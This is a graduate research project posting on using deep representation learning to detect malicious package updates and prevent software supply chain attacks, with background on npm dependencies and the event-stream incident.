Mining software updates to prevent supply chain attacks

Our society relies more and more on information systems that affect all areas of life. The quality of these software systems is fundamental to ensure security, reliability, and trust. These systems are developed using a multitude of external packages or third-party libraries, for instance, according to a security researcher from GitHub, 85% to 97% of enterprise software codebases come from open-source components [1]. Also, these components have transitive dependencies between them, for example, npm (NodeJS package repository) has more than 700000 published packages with an average of 90 direct and indirect dependencies for each package. Hence increasing the influence that propagates from a package to its dependents.
Developers tend to trust the authenticity and integrity of third-party packages hosted on commonly used repositories, and they adopt automated build tools and dependency management systems. However, attacks can be conducted by exploiting package updates to compromise dependent systems. These attacks are known as Supply Chain Attacks [2] which is a growing concern in the industry. They often have access to powerful capabilities at the operating system level to create serious vulnerabilities. The main issue is that the manual review of such type of vulnerabilities is not as obvious, which increases their consequences. For example, the recent attack against the npm package event-stream illustrates the magnitude of the impact of such attacks: the alleged attacker obtained ownership of an important npm package by asking the original developer to take over its maintenance. After that, he was able to make changes that injected malicious behavior. At that time, event-stream was used by 1600 other packages and was downloaded on average 1.5 million times per week.
Several state-of-the-art works have been proposed to analyze package managers (e.g., npm, PyPI, RubyGems, etc.) using heuristics [3], unsupervised learning [4, 5], supervised learning as well as word embedding techniques [6] to detect and identify vulnerable, and potentially malicious, package versions or dependencies. Those studies are mainly based on static, dynamic or metadata analysis. Other interesting tools (e.g., Dependabot) are used for monitoring and fixing malicious versions of package dependencies.
Our objectives:
1. Explore Deep Representation Learning techniques to enable evolutionary reasoning about package code updates.
2. Develop methodologies to analyze new versions of packages to ensure that they are not affected by malicious code changes.
[1] Maya Kaczorowski. Link: https://github.blog/2020-09-02-secure-your-software-supply-chain-and-protect-against-supply-chain-threats-github-blog/. Github Blog, September 2, 2020. Accessed: June 1, 2021.
[2] Marc Ohm, Henrik Plate, Arnold Sykosch, and Michael Meier. ""Backstabber’s Knife Collection: A Review of Open-Source Software Supply Chain Attacks."" In International Conference on Detection of Intrusions and Malware, and Vulnerability Assessment, pp. 23-43. Springer, Cham, 2020.
[3] Ruian Duan, Omar Alrawi, Ranjita Pai Kasturi, Ryan Elder, Brendan Saltaformaggio, and Wenke Lee. ""Measuring and preventing supply chain attacks on package managers."" arXiv preprint arXiv:2002.01139 (2020).
[4] Kalil Garrett, Gabriel Ferreira, Limin Jia, Joshua Sunshine, and Christian Kästner. ""Detecting suspicious package updates."" In 2019 IEEE/ACM 41st International Conference on Software Engineering: New Ideas and Emerging Results (ICSE-NIER), pp. 13-16. IEEE, 2019.
[5] Ohm, Marc, Lukas Kempf, Felix Boes, and Michael Meier. ""If You've Seen One, You've Seen Them All: Leveraging AST Clustering Using MCL to Mimic Expertise to Detect Software Supply Chain Attacks."" arXiv preprint arXiv:2011.02235 (2020).
[6] Lin, Guanjun, Jun Zhang, Wei Luo, Lei Pan, and Yang Xiang. ""POSTER: Vulnerability discovery with function representation learning from unlabeled projects."" In Proceedings of the 2017 ACM SIGSAC Conference on Computer and Communications Security, pp. 2539-2541. 2017.

Connaissances requises

- Software Engineering
- Machine Learning
- Software Security
- Medium level of mastery of Python

Programme d'études visé

Maîtrise avec projet, Maîtrise avec mémoire

Domaines de recherche

Technologies de l'information et des communications

Financement

Bourse de recherche

Autres informations

 Dès que possible - As soon as possible

Personne à contacter

Naouel Moha | naouel.moha@etsmtl.ca